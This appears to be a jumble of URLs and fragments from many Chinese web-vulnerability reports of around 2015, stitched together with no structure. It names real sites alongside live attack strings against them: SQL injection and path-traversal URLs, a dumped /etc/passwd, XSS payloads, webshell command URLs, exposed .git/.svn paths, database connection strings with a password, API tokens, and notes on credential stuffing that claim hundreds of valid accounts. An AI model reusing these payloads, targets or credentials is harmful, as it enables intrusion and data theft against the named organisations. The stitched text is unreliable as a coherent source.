http://**.**.**.**/byqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/sgqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/xyweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414550400141455caa8c0000&flag=1 http://**.**.**.**/dmqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://182.48.115.130:7001/maximo/webclient/login/login.jsp http://182.48.115.130:7001/console/login/LoginForm.jsp http://182.48.115.130:7001/ma/ma3.jsp?o=index http://182.48.115.130:7001/ma/out.jsp http://info.swufe.edu.cn/vlc/?id=1'%22&wall=1 http://doogua.dangdang.com/auth/res/list http://182.254.162.32:7001/etrading/ http://182.254.162.32:7001/console/login/LoginForm.jsp http://182.254.162.32:7001/ma/ma3.jsp jdbc:oracle:thin:@10.232.6.108:1522/ODSDB http://**.**.**.**/ http://**.**.**.**/upload/JF.jsp site:ecnu.edu.cn http://itil.ecnu.edu.cn/itsm/register.do http://itil.ecnu.edu.cn/itsm/index-withoutCA.jsp http://itil.ecnu.edu.cn/itsm/ssd/self_servicedesk.do?method=enter&menuId=m1&processName=%8B%F6&processKey=INC http://itil.ecnu.edu.cn/itsm/ssd/ http://mail2.glsc.com.cn:8084/ http://founder.hiall.com.cn/.git/config http://service.homelink.com.cn/wct/businesscard/personalCard/editPersonalCard?cardId=8***&openId=o****meuRvAepRTTdf1PWBKrQ http://service.homelink.com.cn/wct/businesscard/personalCard/toIndex?code=001a9a0f7e9******b9ea5a1df9590eP&state=201 http://service.homelink.com.cn/wct/userfiles/agent/pressImages/2015101336181.jsp jdbc:mysql://172.27.30.234:3306/***?useUnicode=true&characterEncoding=utf-8 http://vip.changyou.com/.svn/entries http://**.**.**.**/list.php http://**.**.**.**/ggfwzx_news_list.aspx?id=2&type=list&page=1 http://www.vc265.com/site/calendardata https://github.com/liuchaox/welab_bi/blob/95e027b34b0b2845c0db3e1bd767d99d1a9631a6/etl/src/kettle/kettle.properties http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F http://**.**.**.**:9090/xmghSearch/detail.jsp?docid=120 http://**.**.**.**/volunteers/ShowPage.aspx?newsid=9938 http://**.**.**.**/index.php?controller=Articles&action=View&aid=85 http://ess.cninsure.net/portal/product/get_product_list!searchRiskList.action http://interface.api.haodai.com/bapi/TaoOrder/getOrderInfo?os_type=1&appid=1&imei=A0000038518D0C&app_version=28601&auth_tms=20151025220511&auth_did=74590&auth_dsig=66151c927a881a2c&auth_uid=230822&auth_usig=22d4c61c657d2cbb http://**.**.**.**/ http://wooyun.org/bugs/wooyun-2015-0147641 http://221.239.120.208/uddiexplorer/ http://221.239.120.202/uddiexplorer/ https://**.**.**.** http://**.**.**.**/2013/about/lxwm.aspx留言内容处插入XSS语句,等待上钩 http://gopurchase.haier.com/GOPurchase/Common/C http://mail.soufun.com/ http://**.**.**.**/iframe.html https://**.**.**.** https://**.**.**.** https://**.**.**.** https://**.**.**.** http://alwayson.hp.com.cn/AAS http://**.**.**.**/bugs/wooyun-2010-0149063/trace/40ed46c3b88cb092d7c80e7389daa673 http://**.**.**.**/index.php http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**:80/webserver/magazine.aspx?callback=jQuery15102822848288756544_1444642806752&Type=getmagazine&page=4&_=1444642807392&mname=1 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/aboutus/webnewslist3.asp?typeid=30 http://weixin.hazq.com/codeadm/ http://**.**.**.**/bugs/wooyun-2015-0120901 http://**.**.**.**/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**:8080/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**:8080/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 https://online.yeepay.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**/bugs/wooyun-2015-0147705 http://**.**.**.**/pkpmbs/jdmanage/UnitPersonList.aspx?__METHOD=ADD&SUBMIT_TYPE=0&unitID=ffc0782&stationid=2010001&rolecode=JSDW&lzstat_uv=34338219962842780482|1738820&__back2stationlist=/pkpmbs/jdmanage/TJdJianshedanweList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/UnitPersonList.aspx?__METHOD=ADD&SUBMIT_TYPE=0&unitID=ffc0782&stationid=2010001&rolecode=JSDW&lzstat_uv=34338219962842780482|1738820&__back2stationlist=/pkpmbs/jdmanage/TJdJianshedanweList.aspx?lzstat_uv=34338219962842780482|1738820 http://**.**.**.**/pkpmbs/jdmanage/UnitPersonList.aspx?__METHOD=ADD&SUBMIT_TYPE=0&unitID=ffc0782&stationid=2010001&rolecode=JSDW&lzstat_uv=34338219962842780482|1738820&__back2stationlist=/pkpmbs/jdmanage/TJdJianshedanweList.aspx?lzstat_uv=34338219962842780482|1738820 http://mss.95590.cn/mss/,大地保险销售支持系统,此处验证码设计简单,可用PKAV的工具绕过,用户名为工号,可利用社工方法获取工号形式,如8000******、3302******等,这里为了证明问题,我仅选用800012****、800013****、800015****、800050****,以密码abc123、abc456、zxc123、qwe123、123456进行撞库,就获得700多个有效账号,登陆后可进行业绩管理、保单管理、客户管理、车商续保管理等等操作,可泄露大量敏感信息。 http://**.**.**.**/.svn/all-wcprops http://newoa.glsc.com.cn:8082/ http://www.lvmama.com/zt/promo/jingpai/?losc=018454 http://community.apicloud.com/bbs/forum.php http://xm.gameyw.netease.com/ http://online.yeepay.com/live800/loginAction.jsp?companyLoginName=222222&loginName=bbbbb111&password=ggggg http://d.huxiu.com/ http://**.**.**.**/bugs/wooyun-2010-0123172描述的问题,用户名密码test/test http://www.securityfocus.com/bid/72585 https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released http://mips-lb02.ebayc3.com/ www.xin.com http://www.xin.com http://**.**.**.**/bugs/wooyun-2015-0131730 http://www.haodai.com/wenda/listindex?keyword=a http://www.haodai.com/wenda/listindex?keyword=a http://buzz.hiiir.com/ http://doogua.dangdang.com/ http://doogua.dangdang.com/api/pass/sign/in post:name=zxczxc&password=zxczxc http://buzz.hiiir.com/ https://art.netease.com/rest/user/update_base http://**.**.**.**/ http://301.peugeot.com.cn/testdrive/form.php?cselect=3434&pselect=3428 http://**.**.**.**/khfw/product.php?id=130 http://**.**.**.**/khfw/product.php?id=130%20and%201=1-- http://**.**.**.**/khfw/product.php?id=130%20and%201=2-- http://**.**.**.**/khfw/product.php?id=130%20and%201=2%20union%20select%201,2,@@basedir,user%28%29,5,version%28%29,7,8,9,10,11-- http://116.204.8.136:8080 http://113.105.248.132:9000/userdata/ http://segmentfault.com/a/1190000000481249 http://au.umeng.com/api/check_app_update http://oa.baison.com.cn/ http://guimiquan.com/login.html view-source:http://www.kdnet.net/conn.asp/1.php view-source:http://jsapi.kdnet.net/ajax_intellect_board_www.asp/1.php B069A3B7DC5038DE580673ADDB1483CE:FG=1 www.998.com https://github.com/cangjie/d1web http://www.d1.com.cn/.git/config http://businessinfo.co.uk/labs/xss/xss.swf http://**.**.**.**/bmxx_view.php?id=4188 http://nissancorp.dealer.youxinpai.com http://gtmc.dealer.youxinpai.com http://jlr.dealer.youxinpai.com http://xd2sc.dealer.youxinpai.com http://ftms.dealer.youxinpai.com http://dongfeng-citroencorp.dealer.youxinpai.com http://ford.dealer.youxinpai.com http://chrysler.dealer.youxinpai.com http://ghac.dealer.youxinpai.com http://gmmc.dealer.youxinpai.com http://chery.dealer.youxinpai.com http://faw-vw.dealer.youxinpai.com http://faw-mazda.dealer.youxinpai.com http://peugeotcorp.dealer.youxinpai.com http://wdhac.dealer.youxinpai.com http://fawcar.dealer.youxinpai.com http://ford.dealer.youxinpai.com/login/check/ view-source:http://oa.gds-services.com/yyoa/common/SelectPerson/reloadData.jsp http://oa.g5air.com/ http://**.**.**.**/admin/login.jsp http://**.**.**.**/Item/18860.aspx http://**.**.**.** http://**.**.**.**/ http://**.**.**.** http://**.**.**.** http://wanxuem.baidu.com/?act=course&cateids=72365457293705216%22%20onmouseover=alert%28/a/%29%20a=%22&do=GetFragments&mod=search&r=1 http://**.**.**.**/zabbix/ password:zabbix http://www.ziroom.com/static/upload/crm/contract/HTML/2015/04/BJCW81504200616.HTML http://**.**.**.**/main/searchmail.asp http://**.**.**.**/main/searchmail.asp http://admin.eld.leju.com/?site=manager&ctl=login&act=login http://www.95590.cn/ http://**.**.**.**/action/front/indexAction_prepareIndex http://**.**.**.**/common/bak.jsp http://**.**.**.**/bugs/wooyun-2015-0105242 http://ebook.cmbchina.com/Usp/admin/ http://www.swsc.com.cn:8080/manage/admin/admin.jsp https://**.**.**.**/zhaoyh/java/blob/b4e12b1932084e8298ebf8fadb7c9e9bbc1698f5/web/src/main/resources/applicationContext-resource.xml jdbc:mysql**.**.**.**:3306/ted?useUnicode=true&characterEncoding=UTF-8 http://pms.lifesense.com/ http://**.**.**.**:2008/student http://**.**.**.**:2008/student/均可访问 http://**.**.**.**/student/ http://**.**.**.**:2008/student/result.aspx?cid=&id=A58790A7BEB3C308 http://v.9978.cn http://eduadmin.openonline.com.cn/LearningCenter/book/orderstu.aspx?oid=335510 http://learn.open.com.cn http://**.**.**.**/ http://**.**.**/user/user/login http://**.**.**.** http://**.**.**.**/static/interface/errorlog_info.php?page=2&md5=440f1947283d8cc66a39ed3c75263921 http://sfzx.nwpu.edu.cn/wenke/admin/uploadface.asp http://sfzx.nwpu.edu.cn/wenke/admin/uploadfaceok.asp http://saleshop.tcl.com.cn:8080/DRP/ http://saleshop.tcl.com.cn:8080/DRP/login?crmLoginId=gt http://tempuri.org/GetByUnit soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://webservice.mbox.91huayi.com/service.asmx?op=GetDownloadCounts http://webservice.mbox.91huayi.com/service.asmx?op=GetDownload_counts http://tempuri.org/GetByUnitDetail soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ http://crm2.chemicals.sinopec.com:8100/sap/bc/bsp/sap/crm_ui_start/default.htm http://**.**.**.**/ http://**.**.**.**:8180/ http://mobilerma.zte.com.cn/UILoader/Login.aspx https://moa.zte.com.cn http://**.**.**.**:8090/axis2/ http://**.**.**.**:8090/axis2/axis2-web/5.jsp http://60.28.205.41 http://scc.whut.edu.cn http://59.151.27.170 http://59.151.27.170 https://xxx/dana-na/auth/url_default/welcome.cgi http://**.**.**.**:7001/etrading/ http://**.**.**.**:7001/shell/no.jsp不知道密码 http://**.**.**.**:7001/shell/shell.jsp(猜测是命令马) http://**.**.**.**:7001/shell/shell.jsp?cmd=whoami http://www.chuanke.com/3715386-143596.html http://oa.zyxnzj.com/ http://119.6.107.63/mysql/ http://**.**.**.**/ecdomain/framework/housingfund/eejmklkggijibbnpjpkcodgdecfehdgi.jsp http://www.southbeauty.com/index.php?app=activity&c=view&id=49 https://**.**.**.**/funexploit/openstack/blob/8e4fce588a7257ca451a69102faa2106c6f59c5a/rst/env.txt http://m.hit.edu.cn/wp-login.php http://**.**.**/ http://10.111.16.159/meizi/ZTdmNWY1NGE3M2I0MTFlNWI2OTJ8MTQ0NDk4MzU2Ng==.xml http://111.206.107.133/meizi/ZTdmNWY1NGE3M2I0MTFlNWI2OTJ8MTQ0NDk4MDQ0Ng==.xml http://cconline.southernfund.com:9898 http://cconline.southernfund.com:9898/webcall_chat/leaveMessage.jsp http://mail.scdc.com.cn:3000/phpMyAdmin/ http://**.**.**.**/ http://www.yingjiesheng.com/click.php?ID=1121&RedirectUrl=http%3A%2F%2Fs.yingjiesheng.com%2F www.yingjiesheng.com http://**.**.**.**/index.php?file=service&smid=26 http://**.**.**.**/images/2.php http://**.**.**.** http://**.**.**.**/guestbook.php http://**.**.**.**/job_detailed.php?id=5 http://**.**.**.**/news_detailed.php?id=170 http://**.**.**.**/actor_detailed.php?id=* http://**.**.**.**/actor.php?cat_id=-1 http://**.**.**.**/news.php?cat_id=* http://**.**.**.**/works.php?cat_id=*&page=2 http://**.**.**.**:80/ CDC414908799537A0EFB45A67C7613B1:FG=1 http://**.**.**.**/login.aspx http://**.**.**.**/cn/index.html http://**.**.**.**/index.jsp http://182.92.187.7:7001/qmzb/ http://182.92.187.7:7001/console/login/LoginForm.jsp http://182.92.187.7:7001/ma/ma3.jsp jdbc:mysql://localhost:3306/qmzb?useUnicode=true&characterEncoding=utf-8 http://182.92.187.7:7001/ma/out.jsp http://**.**.**.**:9090/wh/mobilelogin.jsp http://**.**.**.**/information/getMoreNotice.action http://**.**.**.**/list.aspx?id=6129 http://**.**.**.**/Info_News_C.aspx?id=70 http://**.**.**.**/index.php http://m.xin.com/s/?cityid=201&t=t&c=10794745” http://wenti.ganji.com/feedback_v2/LogIn https://sslvpn.ganji.com http://www.zyrcw.mobi/pass_checkUser.jsp?company_group_id=2846 http://**.**.**.**:8080/webclient/jsp/login.jsp http://220.181.168.128:8080/ http://60.28.205.48:82/cgi-bin/test-cgi http://www.cn357.com/cvi.php?m=ajax&t=register&func=checkUserName&value=aaaaaaa http://www.zydc001.com/web/index.jsp http://www.zydc001.com/index_small.jsp http://222.136.71.26/index_small.jsp http://www.95590.cn/ http://**.**.**.**/GetArticle.action?articleId=601存在命令执行漏洞 www.998.com http://**.**.**.** https://**.**.**.**/s?wd=site%3A**.**.**.**&pn=0&oq=site%3A**.**.**.**&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=978c59aa00037db8&rsv_t=884aX3rGeJMYepgr6dB8gQNb4%2Fr0QzW5VTXwhCVrZdNFJxC%2BX2OzzqvzaQ%2BdZd95G9qT&rsv_jmp=slow http://union.2345.com/products.php?act=view&item=ie2345%bf%27 http://wooyun.org/bugs/wooyun-2010-068815)添加了between脚本,成功注入 http://fenxiao.lvmama.com/ http://new.edong.com http://eip.swsc.com.cn/SSO/Login.aspx http://gamemo.kugou.com/gamemo.kugou.com.tar.gz http://mail.shhuayi.com index.php/member-getpassword http://**.**.**.**:80/ http://www.apply.zjut.edu.cn/en/student/login/fpassword http://asc.ecnu.edu.cn/ http://218.30.110.85:8080/cgi-bin/test-cgi http://218.75.212.7:8181/yyoa/index.jsp jdbc:mysql**.**.**.**:3306/aqx http://**.**.**.**/api/json/sms.action http://**.**.**.**/bugs/wooyun-2015-0143173文章后,继续测试,虽然加入了验证密码次数,但这弱口令太弱了。佩服管理员。 https://**.**.**.** http://group.ppdai.com/uc_server.tar.bz2 http://**.**.**.**/sc8/ http://**.**.**.**/user/findPassword.do http://club.xywy.com/askquestion.php?fromulr= http://img.tmp.xywy.com/562f11e198662.jpg/1.php http://dj.daojia.com.cn/ site:daojia.com.cn来搜索 http://shanghai.bd.daojia.com.cn/为例 http://shanghai.bd.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1445924202965 http://cm.glsc.com.cn:8079/ http://cm.glsc.com.cn:8079/names.nsf存在越权 http://cm.glsc.com.cn:8079/names.nsf/$users http://elreport.ce-air.com/login.do http://union.ceair.com/ http://airport.csair.com/SelfMonitoring/CussMain.do?method=selectData&city=ALL http://safety.ceair.com:7500/sms/sms/safty/employeereport/emReportHome.zul http://wdt-mx.huawei.com/sdtrp/project.action http://119.145.15.78/sdtrp/project.action http://**.**.**.**/coremail/index.jsp http://**.**.**.**/ccbjob/cn/job/index.jsp http://**.**.**.**/ccbjob/cn/job/resume/source.jsp?code_set_id=3007&sqlType=3&id=30077903&root=30077903 http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login http://**.**.**.**/login https://111.200.229.205/page/maint/login/Page.jsp?templateId=18 http://cctvich.cntv.cn/waiyuadmin/e/admin/FrontLogin.php http://red.ayibang.com http://havboss.vcomlive.com/ http://havboss.vcomlive.com/userValidate?_dc=1445933447187&user=admin&pwd=1234556aa&sysid=2&node=100000&service=http%3A%2F%2F61.158.207.26%3A80%2Foss http://havboss.vcomlive.com/userValidate?_dc=1445933447187&user=admin&pwd=1234556aa&sysid=2&node=100000&service=http%3A%2F%2F61.158.207.26%3A80%2Foss http://sqlmap.org http://**.**.**.**/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://fcdt.800j.com.cn/index.php?m=content&c=newsall&a=investigate&ytlx=2 http://www.easy-linkholiday.com/mapgoogle.asp?id=17679 http://203.130.43.136/Activity/GetActivityIndex.ashx?sessionId=1&req=2501 http://j.china.com/.git/ dir:/home/chineseall/apache-tomcat-6.0.35/webapps/ROOT/ http://www.huandai.net/ http://**.**.**.**/hnwsyy/jxtj.do?type=cx&index=80&jxmc=430942&kskm=2 http://**.**.**.**/wms/upload/file/2013110803082678.xls http://**.**.**.**/wms/upload/file/20130715001425512.xls http://**.**.**.**/wms/upload/file/20120530073654188.xls http://**.**.**.**/wms/upload/file/20120523014231177.xls http://**.**.**.** http://smtp.pindao.com/.git/ http://**.**.**.**/lks/sys/lks_public.nsf/84b5fb13f9d3697c48256b7d00258d27?OpenView http://ts.kuwo.cn/.git/config http://test.cms.imobile.com.cn/.git/ http://test.m.imobile.com.cn/.git/ http://test.pic.imobile.com.cn/.git/ http://test.s.imobile.com.cn/.git/ http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/ http://**.**.**.**/html/p/p_13/p_13.html inurl:cms/leadermail http://wiki.welomo.com/.git URL:http://**.**.**.**/login.action http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/xgweb/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.huishangsuo.com/Style/header/upload.php?uid=61963 http://xms.be.xiaomi.com/common/common!ajaxBrandJson.action?checkedId=1& http://wx.push.ujipin.com/.svn/entries http://ekp.joyu.com/ http://h5.998.com http://h5.998.com/unionpay_bankcard.html http://club.huawei.com/plugin.php?sctime=0&page=3&srchtxt=% http://club.huawei.com/plugin.php?sctime=0&page=3&srchtxt=% jdbc:oracle:thin:@**.**.**.**:1521:hbzqdb http://**.**.**.**/content.asp?id=25425 http://wooyun.org/bugs/wooyun-2010-0149556 http://nissancorp.dealer.youxinpai.com http://gtmc.dealer.youxinpai.com http://jlr.dealer.youxinpai.com http://xd2sc.dealer.youxinpai.com http://ftms.dealer.youxinpai.com http://dongfeng-citroencorp.dealer.youxinpai.com http://ford.dealer.youxinpai.com http://chrysler.dealer.youxinpai.com http://ghac.dealer.youxinpai.com http://gmmc.dealer.youxinpai.com http://chery.dealer.youxinpai.com http://faw-vw.dealer.youxinpai.com http://faw-mazda.dealer.youxinpai.com http://peugeotcorp.dealer.youxinpai.com http://wdhac.dealer.youxinpai.com http://fawcar.dealer.youxinpai.com http://dealer.youxinpai.com http://dealer.youxinpai.com/ck_testcheck/view?bigareaid=1&provinceid=2&cityid=201&car_scarmodel=0&car_scarmodels=&car_serials=&vin=&imei=&status=-1&start_time=2015-10-01&end_time=2015-10-27&submit=%E6%9F%A5%E8%AF%A2 sdbaoye.dzwww.com/index.php?a=public_menu_left&c=Index&m=Home&menuid=1 http://www.qinzhu.ecnu.edu.cn/department/HeartRoom/HeartFront/content.aspx?id=%201448 https://github.com/manageyunying jdbc:mysql://127.0.0.1/manage?useUnicode=true& jdbc:mysql://10.128.7.247:3306/mobileprivatetrace?useUnicode=true& jdbc:mysql://100.98.70.86:3306/managerdb jdbc:mysql://rds1p2w2yitw263r3ygu.mysql.rds.aliyuncs.com/mobilebasic jdbc:mysql://rds54mgaqv8osck2y467.mysql.rds.aliyuncs.com/browserxhrdata jdbc:mysql://rdsbp0m36ou1p84t8349.mysql.rds.aliyuncs.com/tpmsaas jdbc:mysql://rds858w9g04b5598k070.mysql.rds.aliyuncs.com/mobileprivatedata jdbc:mysql://rds3em7yjj9rm36bfr1u.mysql.rds.aliyuncs.com/analytics jdbc:mysql://rds84584weefk677y690.mysql.rds.aliyuncs.com/usercenter jdbc:mysql://10.251.126.18/tpmsaas jdbc:mysql://10.104.15.224/tpmsaas jdbc:mysql://db-server:3306/ymy_test?user=zhaohaijun&password=676892 jdbc:hive2://10.128.17.21:10000 http://manage.oneapm.com/ http://manage.oneapm.com/ http://manage.oneapm.com/ http://manage.oneapm.com/ https://oneapm.kf5.com/ jdbc:mysql://100.98.70.86:3306/managerdb jdbc:mysql://119.29.28.190:3306/webhook http://**.**.**/ http://zhanzhang.anquan.org/vul-detail/52fde4f64eb8d70df476ecb4/ http://e-policy.minanins.com/%c0%ae/WEB-INF/web.xml http://e-policy.minanins.com/%c0%ae/WEB-INF/webContext.xml http://e-policy.minanins.com/%c0%ae/WEB-INF/web-servlet.xml http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**:8080/Dlib/GetPasswdAcc.asp http://**.**.**.**/Dlib/GetPasswdAcc.asp http://**.**.**.**:82//GetPasswdAcc.asp http://**.**.**.**:81/GetPasswdAcc.asp http://**.**.**.**:81//GetPasswdAcc.asp https://bj-sso.365ime.com/sso/authorize?response_type=code&client_id=ime_web&redirect_uri=http://web.365ime.com/ www.u88.com官网redis未授权访问: www.u88.com www.u88.com:6379 URL:http://tcmobileapi.17usoft.com/Movie/default.aspx http://tcmobileapi.17usoft.com/hotel/orderhandler.ashx http://wooyun.org/bugs/wooyun-2010-0137596 http://www.phibrofx.co/zh-cn/read.jsp?id=16,如图所示: https://**.**.**.**/qiyadeng/XrMessage/blob/3f64fa4cd6b3fffa6670b96f3cab9418683b3b69/XuriMessage/code/XuriMessage/src/main/resources/META-INF/spring/database.properties http://**.**.**.** http://**.**.**.**/bugs/wooyun-2015-0116152 http://**.**.**.** http://**.**.**.**/forum/w%3D580/sign=56d6d7942e34349b74066e8df9e81521/016e292a6059252da7d12b8a329b033b59b5b996.jpg http://**.**.**.**/portal/order/TOrderMgr.htm?m=query&f=getOrderById&orderId=83055&unlogflag=1 http://www.lvmama.com/trip/show/64766 www.lvmama.com http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation http://**.**.**.**/news_fullpage.php?pattern=0&table_name=congratulation http://**.**.**.**/manage_main.php http://**.**.**.**/test.php http://www.sxhtjs.com.cn/login http://www.zhimatech.com/.git/config http://**.**.**.**/ http://yun.haodai.com/forget/index jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.**/ http://**.**.**.**/AIPRTJ/home/getEDToTy?LAST_UPDATE_DATE=1970-1-1 http://**.**.**.**/pagelisting.php?id=P00070 http://**.**.**.**/pagelisting.php?id=P00070 http://**.**.**.**/fsmcms/cms/leadermail/p_replydetail.jsp?MailId=20130617090041439521995 http://support.ztenv.com.cn/exp/exp_list_detl.asp?flg=1&expid=511 http://lsb.360shop.com.cn/.svn/entries http://union.kuwo.cn/install/index.jsp http://219.143.252.247:8081/ http://219.143.252.247:8084 http://219.143.252.247:8087/ https://**.**.**.**/oauth2/genqr http://staff.cntv.cn/ http://58.20.40.249:7001/entbank/login.action http://58.20.40.249:7001/console shell:http://58.20.40.249:7001/ca/ma3.jsp encap:Ethernet BB:58:5A addr:172.17.11.32 Bcast:172.17.11.255 Mask:255.255.255.0 MTU:1500 packets:1695524404 dropped:35730435 packets:1656137337 txqueuelen:1000 Interrupt:186 Memory:dc000000-dc012800 encap:Ethernet BB:58:5A addr:172.17.11.33 Bcast:172.17.11.255 Mask:255.255.255.0 MTU:1500 Interrupt:186 Memory:dc000000-dc012800 encap:Ethernet BB:58:5C addr:192.168.10.1 Bcast:192.168.10.255 Mask:255.255.255.0 MTU:1500 packets:5119322 packets:10178977 txqueuelen:1000 Interrupt:193 Memory:da000000-da012800 encap:Local addr:127.0.0.1 Mask:255.0.0.0 MTU:16436 packets:2147483647 packets:2147483647 http://mi.xcar.com.cn/interface/gcpapp/askSalePrice.php http://c.gdt.qq.com/gdt_clickwap.fcg?viewid=laFsxWYgZ_LrcFMuE3oSqZlaETN7Sl1YAdyDMh7_hvdu_WEKLPtQPlvQCtRGdFhyRs31wSg2jlSsuzymM!Us1RsgV6ep7W!ltv8j_ichTqKN5KUJvudeLZ!7XEheWt0g6IQ62yb6UbJ6PnzulnqzYRhWnckyNlZ8&jtype=0&wapver=2&i=1&os=0 http://test2.m.letv.com/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0139485 http://**.**.**.**/wap2stock/infoList.do?classid=1001 http://**.**.**.**/wap2stock/info.do?classid=1001&id=16379 news.sogou.com/wapdata?File=../../../../../../../../../etc/httpd/conf/httpd.conf&Page=1&t=1438273990794&Type=all http://news.sogou.com/wapdata?File=../../../../../../../../../etc/passwd&Page=1&t=1438273990794&Type=all root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin odin:x:500:500::/home/odin:/bin/bash nagios:x:101:501:nagios:/var/log/nagios:/bin/sh netmonitor:x:501:502::/home/netmonitor:/bin/bash guest:x:502:503::/opt/guest:/bin/bash memcached:x:102:158:Memcached daemon:/var/run/memcached:/sbin/nologin smarton:x:503:504::/home/smarton:/usr/bin/uptime http://mail.citvc.com/ http://**.**.**.**/show.asp?id=110&jdfwkey=fpxja http://**.**.**.**/show.asp?id=8149&jdfwkey=fpxja http://m.midifan.com/news.php?companyid=1&page=4 http://sell.ips.com.cn/Login.aspx http://sell.ips.com.cn/User/UserFindPwd.aspx?type=moblie http://**.**.**.**/,可用常用用户名和弱口令123456进行撞库,获取有效账号,登陆后可查看内部信息。 http://**.**.**.**/xwbd/gdgg_nr.asp?id=17 http://**.**.**.**/bzwx/bzwx_nr.asp?id=11352 http://**.**.**.**/sptm/sptm_nr.asp?id=1328 http://**.**.**.**/jgdm/jgdm_nr.asp?id=833 http://**.**.**.**/xwbd/xwbd_nr.asp?id=3509 http://**.**.**.**/wto/wto_nr.asp?id=2880 http://**.**.**.**/tsfb/tsnr_nr.asp?id=3162 URL:http://**.**.**.**/search/search.asp POST:lm=%D0%C2%CE%C5%B1%A8%B5%C0&xm=%B1%EA%CC%E2&key=1&search.x=28&search.y=1 http://a.xcar.com.cn/huodong/201509/showfall/comment.php?tid=2 http://oms.znv.com/exp/exp_list_detl.asp?flg=1&expid=647 http://sandbox.api.haodai.com/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0134796 https://**.**.**.** http://**.**.**.**/ 